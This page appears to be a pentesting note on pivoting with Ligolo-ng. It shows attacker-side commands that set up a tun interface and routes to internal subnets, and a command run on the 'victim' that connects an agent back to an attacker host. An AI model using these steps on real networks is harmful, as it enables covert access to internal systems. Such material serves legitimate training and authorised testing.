Ligolo-ng

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor. When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

This allows running tools like nmap without the use of proxychains (simpler and faster).

First, you will need Ligolo-ng. Head to the GitHub, and download a Ligolo agent from Releases for the architecture of the victim, and a Ligolo proxy for your Kali.

We will add a new interface to our machine, and add routes through this interface for our target networks. First, we must create our new tunnel interface, bring the interface up, and add our route:

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

Add route want to access

sudo ip route add 10.10.120.0/24 dev ligolo
sudo ip route add 10.10.121.0/24 dev ligolo
sudo ip route add 10.10.122.0/24 dev ligolo
sudo ip route add 10.10.123.0/24 dev ligolo

Spawn our proxy (on Kali)

./proxy -selfcert -laddr 0.0.0.0:8080

Connect our agent (on Victim)

.\agent.exe -connect 10.10.14.7:8080 -ignore-cert

control+z to background shell (if using MetaSploit)

After the agent has joined, we can type ‘session’, and using the Enter key, select our session. Once selected, we can start our proxy by typing ‘start’.

Should look as follows (on Kali side)

You can now nmap (or else) without the need of proxychains

Tooling

https://github.com/nicocha30/ligolo-ng

Last updated 1 year ago